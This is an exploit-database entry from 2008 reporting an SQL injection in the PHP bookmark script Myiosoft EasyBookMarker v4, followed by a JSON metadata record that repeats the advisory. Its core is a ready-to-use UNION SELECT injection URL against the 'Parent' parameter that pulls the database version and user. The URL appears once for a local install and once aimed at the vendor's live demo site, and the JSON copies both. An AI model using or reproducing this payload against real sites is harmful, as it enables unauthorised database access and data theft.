ID 1337DAY-ID-4125
Type zdt
Reporter G4N0K
Modified 2008-11-07T00:00:00
Description
Exploit for unknown platform in category web applications
===============================================================
Myiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability
===============================================================
==============================================================================
Myiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability
==============================================================================
[»] Script: [ Myiosoft EasyBookMarker ]
[»] Language: [ PHP ]
[»] Website: [ http://myiosoft.com/?1.4.0.0 ]
[»] Type: [ Commercial ]
[»] Report-Date: [ 07.11.2008 ]
[»] Founder: [ G4N0K ]
===[ XPL ]===
[»] http://localhost/[path]/plugins/bookmarker/bookmarker_backend.php?pagebm=mfolders&Parent=-99999/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(version(),0x3a,user()),5--
===[ LIVE ]===
[»] http://myiosoft.com/products/EasyBookMarker/demo/plugins/bookmarker/bookmarker_backend.php?pagebm=mfolders&Parent=-99999/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(version(),0x3a,user()),5--
===[ Greetz ]===
[»] ALLAH
[»] Tornado2800
[»] Hussain-X
//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...
===============================================================================
exit(); //EoX
===============================================================================
# 0day.today [2018-04-13] #
{"id": "1337DAY-ID-4125", "bulletinFamily": "exploit", "title": "Myiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability", "description": "Exploit for unknown platform in category web applications", "published": "2008-11-07T00:00:00", "modified": "2008-11-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/4125", "reporter": "G4N0K", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-04-13T01:48:04", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T01:44:23", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "hash": "a88f781bba4633f7bd4814d23c6e25ed206596f879f056f51a6ec06ff5ec3316", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "1d3bc92fb047b3eca2a855a497856f40", "key": "sourceHref"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "e7fbdb52228a35dfc97de8a4cadb52b3", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "769e807f0772cdbd7dbff594c4fc6d26", "key": "sourceData"}, {"hash": "1bab4605344f5e4efb7e6170f11ed779", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "1731d46e1a437b3d9d0395ef601c9a06", "key": "title"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "1bab4605344f5e4efb7e6170f11ed779", "key": "modified"}, {"hash": "7ca8a7d9af3d821df9d9eace8a24ffa2", "key": "reporter"}], "history": [], "href": "http://0day.today/exploit/description/4125", "id": "1337DAY-ID-4125", "lastseen": "2016-04-20T01:44:23", "modified": "2008-11-07T00:00:00", "objectVersion": "1.0", "published": "2008-11-07T00:00:00", "references": [], "reporter": "G4N0K", "sourceData": "===============================================================\r\nMyiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability\r\n===============================================================\r\n\r\n\r\n==============================================================================\r\n\tMyiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability\r\n==============================================================================\r\n\r\n\t[\u00c2\u00bb] Script: [ Myiosoft EasyBookMarker ]\r\n\t[\u00c2\u00bb] Language: [ PHP ]\r\n\t[\u00c2\u00bb] Website: [ http://myiosoft.com/?1.4.0.0 ]\r\n\t[\u00c2\u00bb] Type: [ Commercial ]\r\n\t[\u00c2\u00bb] Report-Date: [ 07.11.2008 ]\r\n\t[\u00c2\u00bb] Founder: [ G4N0K ]\r\n\r\n\r\n===[ XPL ]===\r\n\r\n\t[\u00c2\u00bb] http://localhost/[path]/plugins/bookmarker/bookmarker_backend.php?pagebm=mfolders&Parent=-99999/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(version(),0x3a,user()),5--\r\n\r\n\r\n===[ LIVE ]===\r\n\r\n\t[\u00c2\u00bb] http://myiosoft.com/products/EasyBookMarker/demo/plugins/bookmarker/bookmarker_backend.php?pagebm=mfolders&Parent=-99999/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(version(),0x3a,user()),5--\r\n\r\n\r\n\r\n\t\r\n===[ Greetz ]===\r\n\r\n\t[\u00c2\u00bb] ALLAH\r\n\t[\u00c2\u00bb] Tornado2800 \r\n\t[\u00c2\u00bb] Hussain-X \r\n\r\n\t//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)\r\n\t//ALLAH,forgimme...\r\n\r\n===============================================================================\r\nexit(); //EoX\r\n===============================================================================\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/4125", "title": "Myiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability", "type": "zdt", "viewCount": 0}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:44:23"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "00157601768b634735774d15ccd18f9e"}, {"key": "href", "hash": "33b1ca05d320f90ee366991d72208e86"}, {"key": "modified", "hash": "1bab4605344f5e4efb7e6170f11ed779"}, {"key": "published", "hash": "1bab4605344f5e4efb7e6170f11ed779"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "7ca8a7d9af3d821df9d9eace8a24ffa2"}, {"key": "sourceData", "hash": "7bdab378e8efa144f272dfc91f07fee5"}, {"key": "sourceHref", "hash": "497db1855a17eb19058b144e47f1ff22"}, {"key": "title", "hash": "1731d46e1a437b3d9d0395ef601c9a06"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "4199894de66ecb1079dccbc09164b36b9beb080d820dcddbfe9526ba3d0d5013", "viewCount": 0, "enchantments": {"vulnersScore": 7.5}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/4125", "sourceData": "===============================================================\r\nMyiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability\r\n===============================================================\r\n\r\n\r\n==============================================================================\r\n\tMyiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability\r\n==============================================================================\r\n\r\n\t[\u00c2\u00bb] Script: [ Myiosoft EasyBookMarker ]\r\n\t[\u00c2\u00bb] Language: [ PHP ]\r\n\t[\u00c2\u00bb] Website: [ http://myiosoft.com/?1.4.0.0 ]\r\n\t[\u00c2\u00bb] Type: [ Commercial ]\r\n\t[\u00c2\u00bb] Report-Date: [ 07.11.2008 ]\r\n\t[\u00c2\u00bb] Founder: [ G4N0K ]\r\n\r\n\r\n===[ XPL ]===\r\n\r\n\t[\u00c2\u00bb] http://localhost/[path]/plugins/bookmarker/bookmarker_backend.php?pagebm=mfolders&Parent=-99999/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(version(),0x3a,user()),5--\r\n\r\n\r\n===[ LIVE ]===\r\n\r\n\t[\u00c2\u00bb] http://myiosoft.com/products/EasyBookMarker/demo/plugins/bookmarker/bookmarker_backend.php?pagebm=mfolders&Parent=-99999/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(version(),0x3a,user()),5--\r\n\r\n\r\n\r\n\t\r\n===[ Greetz ]===\r\n\r\n\t[\u00c2\u00bb] ALLAH\r\n\t[\u00c2\u00bb] Tornado2800 \r\n\t[\u00c2\u00bb] Hussain-X \r\n\r\n\t//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)\r\n\t//ALLAH,forgimme...\r\n\r\n===============================================================================\r\nexit(); //EoX\r\n===============================================================================\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-13] #"}
{"result": {}}